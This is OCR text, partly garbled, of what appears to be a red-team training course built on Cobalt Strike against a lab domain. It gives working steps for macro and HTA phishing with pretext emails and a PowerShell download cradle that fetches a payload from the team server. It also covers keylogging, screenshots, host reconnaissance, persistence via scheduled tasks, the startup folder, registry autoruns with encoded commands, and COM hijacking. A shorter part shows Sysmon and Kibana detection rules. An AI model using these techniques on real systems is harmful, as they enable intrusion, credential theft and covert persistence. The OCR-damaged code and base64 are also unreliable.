I:l Miﬂﬂ'SUﬁ'\.ﬂfﬂleDbjE’CiS Sub AutoOpen|()
=55 Modules
_ 42 NewMacros Dim Shell As Object
#-[7] References Set Shell = CreateObject ("wscript.shell"™)

Shell.Run "calc"™

Calculator
End Sub

= Standard >

<

Properties - NewMacros

{'lx'v

NewMacros Module
Alphabetic Categorized

[

The same 32/64-bit challenge is present here as well. If the target is running 32-bit Office on a 64-bit OS, we need to use the sysnative path for PowerShell.

To prepare the document for delivery, go to File > Info > Inspect Document > Inspect Document, which will bring up the Document Inspector. Click Inspect and then Remove All next to Document Properties
and Personal Information. This is to prevent the username on your system being embedded in the document.

Next, go to File > Save As and browse to C:\Payloads. Give it any filename, but in the Save as type dropdown, change the format from .docx to Word 97-2003 (.doc). We do this because you can't save macro's
inside a .docx and there's a stigma around the macro-enabled .docm extension (e.g. the thumbnail icon has a huge ! and some web/email gateway block them entirely). | find that this legacy .doc extension is

the best compromise.

When an Office document with an embedded macro is opened for the first time, the user is presented with a security warning (assuming the environment isn't locked down to block macro's entirely). For the macro

to execute, the user mustclick on Enable Content.

AutoSave (@ Off)

File Home Insert Design Layout References Mailings Review Vi
Calibri 11 A A Al K| i=viz=y iy = 3= 8

Paste B I U-ax ¥ A-2-A. E===1=" &5

Clipboard M Font M Paragraph

::!; SECURITY WARNING Macros have been disabled. Enable Content

L .-z-|-1-.-}‘|-.-1-.-z-|-a-.-4-.-5-.-s-.-:

Many real-life samples you may see try to entice the user to click this button - usually saying something along the lines of "Security product XYZ has scanned the content and deemed it to be safe. To reveal it, click

Enable Content".

Now, let's finally look at sending these in a phish.

HTA Phish

We're logged into OWA as iyates - let's send an email to bfarmer, starting with the HTA.

First, let's host the HTA on the Team Server so we can simply send a link for them to download and execute. Go to Attacks > Web drive-by > Host File. Select demo.hta and provide a URI to access it on. When

sending emails from one staff member to another, consider the relationship between them and come up with an email "story" or "pretext" that makes sense.

I'll just call mine staff-survey.

B Host File — ] X

Host a file through Cobalt Strike's web server

File: C:\Payloads\demo.hta ! | |
) E- mmw
Local URI: |ystaffsurveyy |

Local Host [10.10.5.120 "
Local Port: |80 ‘
Mime Type: |automatic v

Launch H Help |

Obviously, your HTA interface should resemble a staff survey form if this is the pretext you have chosen. Everything should come together and be as convincing as possible to the target user(s).

To Bob Farmer X Bor

Cc

Staff Survey

Hi Bob,
Please complete this staff survey at your earliest convenience.

Regardsj

AA A B I U & A = = Z€ 22 = = = @ & ¥ X v

m Discard @J [;| @ &.ﬂ W Draf saved at 1800

Access the console of WKSTN-1 (which should automatically authenticate as bfarmer) and launch Outlook. Clicking the URL in the email should open IE and a window to Open/Save/Save as.

Staff Survey
ahal Yatac
|sabel Yates & http://10.10.5.120/staff-survey
o Bob Farmer
Hi Bob,

Please com plete this staff survey at your earliest convenience,

Regards, Internet Explorer X

What do you want to do with staff-survey.hta?

Size: 469 bytes
From: 10.10.5.120

— Open

The file won't be saved automatically,

—> Save

— Save as

Cancel

Click Open and you should get a Beacon running as bfarmer.

By default, Office has filetype filtering in place that will prevent you from attaching certain files to emails (including HTAs, which is why we'd opt to sending a link instead).

If you try to do so, you'll see a red crossed out circle icon on the attachment.

To Bob Farmer X
Ce
Test
‘ N testhta X
165 bytes
This is a test

On the receiving end, the user will see a warning that an unsafe attachment was blocked.

2 Reply 2 Reply &1l 3 Forward
Isabel Yates Bob Farmer

Test

0 Dutlook blocked access to the following potentially unsafe attachments: testhta.

Thisisa test

Word Doc Phish

The document can work well sent as an attachment.

To Bob Farmer X

(m =)
m

|

Cc

Document for Review

-

=| 33K v

ﬂ 5 demo.doc X

Hi Bob,
Could you please review the attached proposal as soon as you can?

Regards,

>
>
"
=
[=
'y
| >
]
[
|
b
1]
1
il
®
&
Hm
I_u:?!l-':
4

B

©

D'
<

m Discard @J

Opening the document directly from Outlook and clicking Enable Content will spawn another Beacon as bfarmer.
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Parent-Child Relationships

Processes have a one-to-many relationship, referred to as parent and children. When one process starts another, that new process is a child of the process that started it. A process may have many children, but
only one parent. These relationships can be a good indicator of malicious activity on a system - this is a point that we won't dwell on too much throughout this course as we're still learning basic tradecraft, but

we'll introduce the concept here.

In the example above, Microsoft Word started PowerShell to execute our payload. This created a relationship by which powershell.exe is a child of winword.exe. This isn't normal behaviour and highly suspicious.

v [ WINWORD.EXE
v L% powershell.exe
BN conhost.exe

Sysmon and other defensive products can log process creation events, which includes the details of the parent and child. Defenders can use this information to trigger alerts when "sensitive" applications create

children.

ProcessId: 23@8
Image: C:\Windows\System32\WindowsPowerShell\v1l.@\powershell.exe
CommandLine: "C:\Windows\System32\WindowsPowerShell\vl.@\powershell.exe" -nop -w hidden -c "IEX ((new-object

net.webclient).downloadstring( http://10.10.5.120:80/a"))"

User: DEV\bfarmer

ParentProcessId: 3684

ParentImage: C:\Program Files\Microsoft Office\root\Officel6\WINWORD.EXE

Finding the Needle

You can verify this behaviour using the Elastic installation in the lab. In the main Snap Labs Dashboard, click the Apps link in the top menu and then click the monitor icon next to the Kibana App entry. The

credentials are elastic:elastic.

Kibana —
https://10.10.15.174:5601 -

We can start by finding all the Process Creation events logged by Sysmon. From the Kibana home page, expand the menu in the top-left and then select Discover underneath the Analytics header. In the search

box, enter:

event.module : sysmon and event.type : process start

The number of events you get back will depend on how long your lab has been running. | have about 3,000 results from the 8 hosts that are being logged. You can start to appreciate the difficultly in finding
specific malicious activity across an entire enterprise environment with hundreds or even thousands of machines. For that reason, we need to narrow down the search with additional parameters. Specifically, in

this case, we're interested in instances where MS Office applications are the parent. So we can add the following to the search:

and process.parent.executable : *¥EXCEL.EXE | *WINWORD.EXE | *POWERPNT.EXE

Essentially what we're doing here is only returning results where the parent process path ends with EXCEL.EXE OR WINWORD.EXE OR POWERPNT.EXE. When writing these queries, there are several aspects a

defender needs to think about. Some that spring to mind are:

¢ Doesthe query cover all eventualities of interest?
* Are there edge cases that this will miss?

* |sthe query performant?

A simple way to break this particular relationship is to use the WMI Win32_Process class to create the process:

Dim proc As Object

Set proc = GetObject(

proc.Create

In this instance, PowerShell will be a child of WmiPrvSE.exe rather than MS Word.

EXERCISE: Execute different phishing payloads and find the corresponding logs in Kibana.
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Building Alerts in Kibana

The Security App in Kibana allows us to build detections that will generate alerts automatically, and provides tooling to aid investigation and remediation. I've pre-built some alerts that will come into play as you

progress through the course, but you may wish to modify them or even build your own.
There is no alert for Office child processes, so let's build that now.

From within the Security app, click on Rules in the left-hand menu. Then click Create new rule in the top-right. There are different rule types available, for this rule we'll use Custom query. Under the Index
patterns heading, remove all the indexes except for winlogbeat. This is the index the Sysmon events are going into.

Copy and paste the same search query used in the previous lesson into the Custom query box. You can also save queries that you use often and re-use them here. Click the Preview results button to make sure

there is data being returned from the query.
Click Continue and fill out some supplementary information about the rule including a name, description and severity etc. There are other cool things you can do like associate the rule with MITRE ATT&CK tactics.
Under Schedule Rule, | will set both runs every and look-back time to 5 minutes.

We're not going to associate any actions with this rule, so leave the Actions frequency to Perform no actions. Actions that can be performed include sending an email; raising tickets in Jira or ServiceNow; or

sending a message via Teams or Slack.

Finally, click on Create & active rule.

This rule is now active for data generated from now, they do not retrospectively go back through historical data. To see the alert in action, execute your macro payload again and go to the Alerts view in the app.

Remember that the rule will run every 5 minutes, so the alert won't appear until the next time the rule is run. You can see a rule's last run time in the Rules view.

Soon, you'll see a new open alert.

Alerts Manage rules

m Acknowledged  Closed Updated 10 seconds ago

Count Stackby  signal.rule.name v Trend Stackby  signal.rule.name v
signal.rule.name Count 1 Microsoft Office Child
0.8 Process
Microsoft Office Child 1 .
Process 8
4
1
01-20 00:00 01-2003:00 01-20 068:00 01-20 08:00 01-2012:00 01-20 15:00 01-20 1800 01-20 21:00
1 alert El] Fields = Columns T 1field sorted [C] Full screen Additional filters ~ Grid view
Actions J- @timestamp ~  Rule v Severity “ Risk Score * Reason v ho
,_.f' 335 ooo Efj Jan 20, 2022 @ 18:37:59.661 Microsoft Office Child Proc... high 73 process event with processqowershell.exe, parent process EXCEL.EXE, by ... wk:

Click on View details (icon of diagonal line with two arrows) to get a summary of the alert. It will give you some information such as the hostname, username, the parent process name and the process arguments

that were spawned.

Microsoft Office Child Process

Overview ThreatintellJ Table JSON

Reason

process event with process powershell.exe, parent process WINWORD.EXE, by bfarmer on wkstn-1.d¢

Process.

View Rule detail page

Document Summary

Status -

Timestamp Jan 20,2022 @ 18:48:05.351
Rule Microsoft Office Child Process
Severity high

Risk Score 73

host.name wkstn- 1.dev.cyberbotic.io
user.name bfarmer

process.name powershell.exe
process.parent.name WINWORD.EXE

C:\Windows\System32\WindowsPowerShell\v 1.0\powershell.exe

-nop

=N

hidden

-C

IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/a")

process.args

Click on Analyze event (little cube icon) to get the awesome looking process tree.

X Close analyzer

GJ"-"}.«;‘.
All Process Events ’ac%
s RUNNING PROCESS
explorer.exe
Process Name Timestamp 1 configuration | 1 registry
Jan 20,2022 @ i
smss.exe ®
16:27:41.645 RUNNING PROCESS
WINWORD.EXE
_ Jan 20, 2022 @ 3 configuration | 4 network
winlogon.exe |
16:27:41.667 3 registry

< ,5%3

ANALYZED EVENT - RUNNING PROCESS
powershell.exe

Jan 20, 2022 @

° userinit.exe
16:27:50.315

1 file

Jan 20, 2022 @

o explorer.exe
16:27:50.382

Jan 20,2022 @
© WINWORDLE...

16:29:34.636
ANALYZED EVE... Jan 20, 2022 @
" powershell.... 18:45:38.752

COMPLETE & CONTINUE —
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Host Reconnaissance

Before we carry out any post-exploitation steps, it's prudent to take stock of the current situation. Every action that we perform carries some risk of detection. The level of that risk depends on our capabilities and

the capabilities of any defenders. We can enumerate the host for indicators of how well it's being protected and monitored. This can include Antivirus (AV) or Endpoint Detection & Response (EDR) software,

Windows audit policies, PowerShell Logging, Event Forwarding and more.

"Defence in Depth" is a concept by which multiple (independent) layers of security controls are placed throughout a system or environment - the intent is to provide a level of redundancy so in the event one fails,

others remain. We must be prepared to bypass multiple layers of security.

"Offence in Depth" is a similar concept for red teamers. The information gathered here should be used to shape the actions you carry out or the tactics you employ. For instance - if you have a favourite PowerShell
script that performs "X" but PowerShell logging is enabled, you may need to avoid performing "X" altogether, or find an alternate means of doing it (e.g. .NET instead of PowerShell). Good offensive engineers will

have multiple tools or methodologies for achieving the same outcome.
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Seatbelt

Seatbelt is a .NET application written in C# that has various "host safety-checks". The information it gathers includes general OS info, installed antivirus, AppLocker, audit policies, local users and groups, logon

sessions, UAC, Windows Firewall and more.

Compilation

The majority of open source tooling on GitHub is provided as source code without pre-compiled binaries, so we have to compile them ourselves. Open Visual Studio (not Visual Studio Code), select Open a project

or solution and select C:\Tools\Seatbelt\Seatbelt.sln.

The first thing you'll see is a warning about the target framework not being installed.

Project Target Framework Not Installed ? X

The C# project "Seatbelt” is targeting ".NETFramework Version=v3.5", which is not installed on this
machine. To proceed, select an option below.

(@) Change the target to .NET Framework 4,6.1. You can change back to “.NETFramework, Version=v3.5"
at a later time.

(") Download the targeting pack for “.NETFramework, Version=v3.5". The project will not change.

(O) Do not load the project.

[] Do not ask me again during this operation oK

The Seatbelt project is configured to target .NET Framework 3.5 which is not installed on our machine (or any of the machines in the lab for that matter). v3.5 is installed by default on Windows 7, 8, 8.1 and very

early builds of 10.

Each subsequent build of Windows 10 comes with a newer version of .NET Framework. A quick break-down:

Windows Build Default .NET Framework Version

1511 4.6.1
1607 4.6.2
1703 4.7

1709 4.7.1
1803, 1809 4.7.2
1905+ 4.8"

*4.8 is the last version of .MET Framework that Microsoft will release.

You can enumerate the .NET Framework version installed on a host by reading the Release DWORD in the registry.

beacon> reg queryv x64 HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full Release

Release 460805

Cross-referencing 468885 here we can see this is v4.7.

So does this mean we have to enumerate the exact version of the .NET Framework installed on a target and compile the assembly for that specific version? No. The Common Language Runtime (CLR) is a

component of the .NET Framework that manages the execution of .NET assemblies, and each .NET Framework release is designed to run on a specific version of the CLR.

.NET Framework Version CLR Version
2.0,3.0,3.5 2
4,4.5-4.8 4

From the table above, we can see that .NET Framework v3.5 executes on CLR v2; and all 4.x versions execute on CLR v4. This is the primary consideration when choosing a .NET Framework target. This means that

(for instance) a .NET assembly that has been compiled to target v4.5 will still run on a machine that only has v4 installed.

So in Visual Studio, just click OK to change the target framework to 4.6.1. Then go to Build > Build Solution. This will compile Seatbelt to the following path:
C:\Tools\Seatbelt\Seatbelt\bin\Debug\Seatbelt.exe.

Execution

The execute-assembly command allows Beacon to run .NET executables directly from memory, so (generally speaking) there is no need to upload these tools to disk before running them.

beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Debug\Seatbelt.exe -group=system

This command will produce quite a lot of output, but do take the time to look through it all.

In terms of security configurations, these are some interesting entries:

AppLocker

[*] Applocker is not running because the AppIDSvc is not running

LAPS Enabled

0SInfo

IsLocalAdmin

PowerShell
Script Block Logging Settings
Enabled

Services

Non Microsoft Services (via WMI)
Name : Sysmon6t4d

BinaryPath : C:\Windows\Sysmon64.exe

FileDescription : System activity monitor

ERROR: Unable to collect. Must be an administrator.

[*] LocalAccountTokenFilterPolicy == 1. Any administrative local account can be used for lateral movement.

WindowsFirewall
Domain Profile
Enabled : False

Private Profile
Enabled : False

Public Profile
Enabled : False

Enumerating the user's environment with -group=user can be equally important. For instance, this mapped drive entry shows us that elements of the user's profile is mounted on a remote share.

Mapped Drives (via WMI)

LocalName : H:

RemoteName : \\dc-2\home$\bfarmer

RemotePath : \\dc-2\home$\bfarmer

Status : 0K

ConnectionState : Connected

Persistent : False

UserName : DEV.CYBERBOTIC.IO\bfarmer

Description : RESOURCE CONNECTED - Microsoft Windows Network

This is commonplace as it allows user's files to follow them in a working environment where they may not be logging into the same computer each time. If we list C: \Users\bfarmer, we actually see there is no

Desktop, Documents or Downloads folder. This is because they are mounted on H.
beacon> 1s H:\

Size Type Last Modified Name

dir @5/25/2021 ©9:34:38  Desktop
dir 82/25/2021 13:06:01 Documents
dir 82/23/2021 15:16:33 Downloads

MARK INCOMPLETE ‘
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Screenshots

Taking screenshots of the user’s desktop can be useful just to see what they are doing. It can show what systems or applications they're using, what shortcuts they have, what documents they’'re working on and so

on.

Beacon has multiple commands for taking screenshots which work in slightly different ways.
printscreen Take a single screenshot via PrintScr method
screenshot Take a single screenshot

screenwatch Take periodic screenshots of desktop

beacon> screenshot

[*] received screenshot of Secret Application - Internet Explorer from bfarmer

To see all the screenshots that have been taken, go to View > Screenshots.

B Cobalt Strike O >
O O E=¢ a82,U e fa B g

external intermal = listener user computer note process pid arch last

o I [ (D-port-gi i3 2 DIOWE 2l exE = i

Beacon 10.10.17.231@2116 X

Screenshots X

user computer Se550n

bfarmer WHKSTN-1 1

when  |Secret Application - Internet Explorer

0510 11:43:59

J -

Welcome to the super-secret internal application.

—

= Secret Application
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Keylogger

A keylogger can capture the keystrokes of a user, which is especially useful for capturing usernames, passwords and other sensitive data.

beacon> keylogger

[+] received keystrokes from Secret Application - Google Chrome by bfarmer

All keystrokes can be seen at View > Keystrokes.

New Tab - Google Chrome

http://srv-1

srv-1 - Google Chrome

bfarmer[tab]Sup3rman

The keylogger runs as a job that can be stopped with the jobkill command.

beacon> jobs
[*] Jobs

JID PID Description

keystroke logger

beacon> jobkill 1

COMPLETE & CONTINUE =
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Host Persistence

Persistence is a method of regaining or maintaining access to a compromised machine, without having to exploit the initial compromise steps all over again. Workstations are volatile since users tend to logout or

reboot them frequently.

If you've gained initial access through a phishing campaign, it's unlikely you'll be able to do so again if your current Beacon is lost, which could be the end of the engagement. If you're on an assume-breach (or
indeed in this lab) and have access to an internal host, the loss of complete access to the environment is less of a concern. However, you may still need to drop one or more persistence mechanisms on hosts you

control if your simulated threat would also do so.

Installing persistence usually involves making some configuration change or dropping a payload to disk, which is why they can carry a high risk of detection, but they are also very useful (and practically essential)

during long-term engagements. You must strike a delicate balance of keeping the operation going and getting caught.

Persistence can be executed within userland (e.g. as the current user) or in an elevated context such as SYSTEM. Elevated persistence requires that we become local admin on the host first, which is covered in the

Privilege Escalation section coming up next.

Common userland persistence methods include:

e HKCU / HKLM Registry Autoruns
¢ Scheduled Tasks
¢ Startup Folder

Cobalt Strike doesn't include any built-in commands specifically for persistence. SharPersist is a Windows persistence toolkit written by FireEye. It's written in C#, so can be executed via execute-assembly.
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Task Scheduler

The Windows Task Scheduler allows us to create "tasks" that execute on a pre-determined trigger. That trigger could be a time of day, on user-logon, when the computer goes idle, when the computer is locked, or
a combination thereof.

Let's create a scheduled task that will execute a PowerShell payload once every hour. To save ourselves from having to deal with lots of quotations in the IEX cradle, we can encode it to base64 and execute it using
the ~-EncodedCommand parameter in PowerShell (often appreciated to -enc).

This is a little complicated to do, because it must use Unicode encoding (rather than UTF8 or ASCII).

In PowerShell:

PS C:\> [System.Convert]::ToBaseb4String([System.Text.Encoding]: :Unicode.GetBytes(%str))

SQBFAFgATAAOACgAbeBl1AHCALQBVAGIAagBl1AGMAdAAEAGAAZQBOACAAdWB 1AGTAYWBSAGKAZQBUAHQAKQAUAGQAbwB3AG4AbABVAGEAZABzAHQACEBpAGAAZWAOACTAaABOAHQACAAGACSALWAXADAAL gAXAD
AAL pA1ACAAMQAYADAAL wBhACTAKQApAA==

In Linux:

root@kali:~# str="IEX ((new-object net.webclient).downloadstring("http://10.106.5.128/a™))"

root@kali:~# echo -en $str | iconv -t UTF-16LE | base64 -w @

SQBFAFgATAACACgAbgBl1AHCALQBVAGIAagB1AGMAdAASAGAAZQBOACAAdWB IAGIAYWBsAGKAZQBUAHQAKQAUAGQAbWB3AGAADABVAGEAZAB zAHQACgBpAGAAZWAOACTAaABOAHQACAAGACSALWAXADAAL gAXAD
AAL gA1ACAAMQAYADAAL wBhACTAKQApAA==

beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Debug\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\vl.0\powershell.exe"
-a "-nop -w hidden -enc
SQBFAFgATAAOACEAbgBl1AHCALQBVAGIAagBl1AGMAdAAZAGAAZQBOACAAdWB1AGIAYWBSAGKAZQBUAHQAKQAUAGQAbWB3AGAADABVAGEAZAB zAHQACEBpAGAAZWAOACTAaABOAHQACAAGACSALWAXADAAL gAXAD

AAL gA1ACAAMQAYADAALWBhACTAKQApAA==" -n “"Updater” -m add -o hourly

[*] INFO: Adding scheduled task persistence

[*] INFO: Command: C:\Windows\System32\WindowsPowerShell\vl.@\powershell.exe

[*] INFO: Command Args: -nop -w hidden -enc

SQBFAFgAIAACACgAbgBl1AHCALQBVAGIAagB1AGMAdAASAGAAZ(QBOACAAdWB IAGIAYWBsAGKAZQBUAHQAKQAUAGQAbWB3AGAADABVAGEAZAB zAHQACgBpAGAAZWAOACTIAaABOAHQACAAGACSALWAXADAAL gAXAD
AALgA1ACAAMQAYADAALWBhACTIAKQApAA==

[*] INFO: Scheduled Task Name: Updater

[*] INFO: Option: hourly

[+] SUCCESS: Scheduled task added

Where:

-t is the desired persistence technique.

-C is the command to execute.

e -3 are any arguments for that command.

-n is the name of the task.

-m is to add the task (you can also remove, check and 1ist).

-0 is the task frequency.

On the console of WKSTN-1, open the Task Scheduler and select Task Scheduler Library in the left-hand menu. You should see your task appear in the main window. You may of course wait for one hour, or

simply highlight the task and click Run in the right-hand Actions menu. This should spawn another Beacon.

COMPLETE & CONTINUE —
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Startup Folder

Applications, files and shortcuts within a user's startup folder are launched automatically when they first log in. It's commonly used to bootstrap the user's home environment (set wallpapers, shortcut's etc).

beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Debug\SharPersist.exe -t startupfolder -c

"C:\Windows\System32\WindowsPowerShell\vl.@\powershell.exe”™ -a "-nop -w hidden -enc
SQBFAFgATAAOACEgAbgBl1AHCALQBVAGIAagBlAGMAdAAEAGAAZ(QBOACAAdWB1AGIAYWBSAGKAZQBUAHQAKQAUAGQAbWB3AGAAbABVAGEAZ ABZAHQACgBpAGAA/WAOACTAQABOAHQACAABACSALWAXADAAL gAXAD
AAL gA1ACAAMQAYADAALWBhACTAKQApAA==" -f "UserEnvSetup” -m add

[*] INFO: Adding startup folder persistence

[#] INFO: Command: C:\Windows\System32\WindowsPowerShell\vl.@\powershell.exe

[*] INFO: Command Args: -nop -w hidden -enc

SQBFAFgATAAOACgAbgBl1AHCALQBVAGIAagBl1AGMAdAAEAGAAZQBOACAAdWB 1AGTAYWBsAGKAZQBUAHQAKQAUAGQAbWB3AGAADABVAGEAZAB zAHQACgBpAGAAZWAOACTAaABOAHQACAAGACSALWAXADAAL gAxXAD
AAL pA1ACAAMQAYADAALWBhACTAKQApAA==

[*] INFO: File Name: UserEnvSetup

[+] SUCCESS: Startup folder persistence created

[*] INFO: LNK File located at: C:\Users\bfarmer\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UserEnvSetup. lnk

[*] INFO: SHA256 Hash of LNK file: B34647F8D8B7CE28C1FODA3FF444D9B7244C41370B88061472933B2607A169BC

Where:

e -T isthe filename to save as.

Use the WKSTN-1 console to check C: \Users\bfarmer\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ forthe file that was dropped. To test it, simply double-click the

link file to run or reboot the VM.

COMPLETE & CONTINUE =
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Registry AutoRun

AutoRun values in HKCU and HKLM allow applications to start on boot. You commonly see these to start native and 3rd party applications such as software updaters, download assistants, driver utilities and so on.

Generate a Windows EXE payload and upload it to the target.

beacon> cd C:\ProgramData
beacon> upload C:\Payloads\beacon-http.exe

beacon> mv beacon-http.exe updater.exe

beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Debug\SharPersist.exe -t reg -c¢ "C:\ProgramData\Updater.exe” -a "/q /n" -k "hkcurun®™ -v

"Updater” -m add

INFO: Adding registry persistence

INFO: Command: C:\ProgramData\Updater.exe

INFO: Command Args: /q /n

INFO: Registry Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
INFO: Registry Value: Updater

INFO: Option:

SUCCESS: Registry persistence added

Where:

o -k isthe registry key to modify.

« -V isthe name of the registry key to create.

As betore, you can test this by rebooting the VM.
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COM Hijacking

Component Object Model (COM) is a technology built within the Windows operating system that allows intercommunication between software components of different languages. Imagine two applications written

in two different languages that cannot natively talk with each other - COM offers standard interfaces which when implemented by those respective applications, allows information to flow between them.

Each COM component is identified via a class ID (CLSID) and each component exposes functionality via one or more interfaces, identified via interface I1Ds (11Ds). A COM class (coclass) is an implementation of one or

more interfaces, represented by their CLSID or a programmatic identifier (ProglD).

In Windows, COM classes and interfaces are defined in the registry under HKEY_CLASSES_ROOT\CLSID and HKEY_CLASSES_ROOT\Interface respectively. There is also registration-free COM (RegFree COM) which

allows a COM component to exist without using the registry. In this case, data such as CLSID is stored in an XML manifest file.

If we have a look at some random keys within HKCU\CLSID, we may see something like:

ﬁ' Registry Editor
File Edit View Favorites Help
Computer\HKEY_CLASSES_ROOT\CLSID\{64AB4BB7-111E-11d1-8F79-00C04FC2FBET \InProcServer32

> || (64812D10-4F9B-11CF-B6EA-ODAAODBI2EE) A || Nome Type Data
> (64818D11-4F9B-11CF-26EA-0DAADDBIZIES] ab) (Default) REG_SZ C\Windows\System32\ieframe.dl
» | | {649b3cc6-4621-413f-a08b-5aedd333F6b) ) ThreadingMode! e Anmiiaeat

» | | {B49CTFDB-B3F7-4683-8948-C9189D7C3C1D}
-3 || {B49EEC1E-B579-4ESC-BB3B-4997FB426536}
. v | | {64AB4BB7-111E-11d1-8F79-00CO4FC2FBE1]
Pl InProcServer32

- =| | ProglD

» | | {B4AE6F2A-2EE6-44FC-BB83-112D6002D3ET)

P L L mE A ARG F AR AR —— L BT

An in-process server allows the specified DLL (this DLL is the actual coclass implementation for this CLSID) to be loaded into the process space of the calling application - InProcServer32 registers a 32bit in-
process server. The ThreadingModel can be Apartment (Single-Threaded), Free (Multi-Threaded), Both (Single or Multi) or Neutral (Thread Neutral).

You may also find LocalServer32, which provides a path to an EXE rather than DLL.

OleView .NET also allows us to find and inspect COM components.

O OleView .NETv1.11 - 64bit - O X

File Registry Object Security Processes Storage Help

" Registry Properties ) CLSIDs | - x (2

_ || o

Fiter: |64AB4BB7-111E-11d1-8F79-00C04FC2FBET Mode: Contains *-*J' L Apply «__”1]'

H% &4ab4bb7-111e-11d1-8f79-88cedfc2fbel - Microsoft Shell UI Helper a_r'
- ID1spatch T
-« IDispatchEx %‘-
.« IObjectsafety -
-.+0 IObjectwithsite

%@ Ishellulxelper
.+ IShellulHelper2
.+ IShellulHelper3
—-#@ IShellUIHelpers
a4 IShellulHelpers
..+@ IshelluIxelpers
-.#@ IshelluIxelpers
-.#@ Tunknown

- Factory Interfaces

Showing 1 of 7819 entries

COM hijacking comes into play when we are able to modify these entries to point to a different DLL - one that we control. So that when an application tries to call a particular coclass, instead of loading
C:\Windows\System32\ieframe.dll (for example), it will load C:\Temp\evil.dll or whatever we specify. The danger with hijacking COM objects like this is that you will break functionality. Sometimes that will be a
relatively mundane 3rd party application, it may be a critical business application or it may be the whole OS. Hijacking a COM object without an understanding of what it does or what it's for is a very bad idea in a

live environment.

HKEY_CLASSES_ROOT is not the whole story when it comes to COM - when an application attempts to locate an object, there is a search order that it goes through. Machine-wide COM objects are located in
HKEY_LOCAL_MACHINE\Software\Classes and per-user objects in HKEY_CURRENT_USER\Software\Classes. These locations are then merged to form HKEY_CLASSES_ROOT.

Any user can hijack or even register new COM objects within HKCU - these only apply to themselves but they do take precedence over those in HKLM. So if a COM object is located within HKLM, we can place a
duplicate entry into HKCU which will be executed first.

COMPLETE & CONTINUE —
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Hunting for COM Hijacks

Instead of hijacking COM objects that are in-use and breaking applications that rely on them, a safer strategy is to find instances of applications trying to load objects that don't actually exist (so-called

"abandoned" keys).

Process Monitor is part of the excellent Sysinternals Suite. It shows real-time file system, registry and process activity and is very useful in finding different types of privilege escalation primitives. Launch

procmon64.exe on attacker-windows.

Due to the sheer number of events generated, filtering is essential to find the ones of interest. We're looking for:

* RegOpenKey operations.
* where the Resultis NAME NOT FOUND.

e and the Pathends with InprocServer32.

Architecture g

Resst

Column

& Operation

-,J Result

1&@ Path

€9 Process Name
“3 Process Name
ﬁ Process Name
1 28 Pracess Name

Process Monitor Filter

Display entries matching these conditions:

o

Value

RegOpenkey

NAME NOT FOUND
InprocServer3?
Procmon exe
Procexp exe
Autoruns exe
Pracmonkd exe

oK

v | then Incude

Add

Action e
Include
Include
Include
Exclude
Exclude

Exclude
Fuachide -

Cance

'_|-||..

To speed the collection up, click random things, go into the Windows menu, launch applications etc. After just a few minutes, | have over 5,000 events - most of them from Explorer, some from 3rd party software

and others from OS components.

File Edit Ewvent Filter

FEH SBE <AS

£ Process Monitor - Sysinternals: www.sysinternals.com

Tools Options Help

LN B4 S

Time ... Process Name

13:47.... ' Bxplorer EXE
13:47:...  Explorer EXE
13:47:... ' Explorer EXE
13:47.... m Bplorer EXE
13:47.... ' Explorer.EXE
13:47:... ' Explorer EXE
13:47: . ' Explorer EXE
13:47.... v Explorer.EXE
13:47.... ' Explorer EXE
13:47:... ¢ Bxplorer EXE
1347 . ' Explorer EXE
13:47.... ' Bxplorer EXE
13:47.... ' Explorer EXE
13:4T7:...  Explorer EXE
13:47.... ' Explorer EXE
13:47.... v Explorer,EXE
13:47.... 7 Bxplorer EXE
13:47:... ' Explorer EXE
13:47.... & msedge exe
13:47.... @ msedge exe
13:47.... @ msedge exe
13:.47:... g msedge exe
13:47.... g msedge exe
13:47.... § msedge exe
13:.47:... {Cmsedge exe
1347 @ msedge exe
1347, @ msedge exe
13:47.... g msedge exe
13:.47.... g msedge exe
13:47. . € msedge exe
13:47.... ' BExplorer.EXE
13:47.... ' Explorer EXE
13:47:... ¢ Bxplorer EXE
13:47: . ' Bxplorer EXE
13:47.... ' Bxplorer EXE
13:47.... ' Explorer EXE
13:47:...  Explorer EXE
13:47.... ' Explorer EXE
13:47.... s BExplorer.EXE
13:47.... g Bxplorer EXE
13:47: . ' Explorer EXE
13:47.... v BExplorer EXE
13:47.... 'ye Bxplorer EXE
13:47:... g Explorer EXE
13:47:...  Explorer EXE
13:47:... i Bxplorer EXE

PID Operation

59568 % RegOpenkey
5968 @ RegOpenKey
5968 @ RegOpenkey
5968 @ RegOpenKey
5968 @XRegOpenkey
5968 @ ReqOpenkey
5968 @ ReqOpenKey
5963 #%RegOpenkey
5968 @€ RegOpenkey
5968 @ ReqOpenkey
5965 @ ReqOpenKey
5965 @ RegOpenKey
5968 @& RegOpenkey
5968 @ ReqOpenkey
5968 #¥RegOpenkey
5968 @ RegOpenKey
5968 @ ReqOpenkey
5968 @4 ReqOpenKey
22720 #%RegOpenkey
22720 @2 RegOpenkKey
22720 @ RegOpenKey
22720 @¥ RegOpenkey
22720 & RegOpenKey
22720 #%RegOpenkey
22720 @ RegOpenKay
22720 ﬁHegDpenl'{ey
22720 @& RegOpenKey
22720 @& RegOpenkKey
22720 @¥ReqOpenkey
22720 ﬁHegDpenKey
5968 #%RegOpenkey
5968 @¢RegOpenkey
5968 @ ReqOpenkey
5968 @ RegOpenkey
5963 #¥RegOpenkey
5968 @& RegOpenkey
5968 @ ReqOpenkey
5968 &% RegOpenkey
5968 @ RegOpenKey
5968 @ ReqOpenkey
5968 @ ReqOpenKey
5963 &% RegOpenkey
5968 @XRegOpenkey
5968 @ ReqOpenkey
5968 @¥RegOpenkey
5368 @ RegOpenkey

Path

HKCUNSoftware \Classes \CLSIDN{DESAAE11-A475-4c 5b-ABO0-CEEDE400274E InProc Serverd2
HKCU\Software\Classes \CL SID\{DESAAE 11-A475-4c 5b-ABD0-C66DE400274E \InProc Serverd2
HKCU\Software \Classes \CLSIDV{0ESAAE 11-A475-4C5B-AB00-C 66D E4D0274E ) \InProc Server32
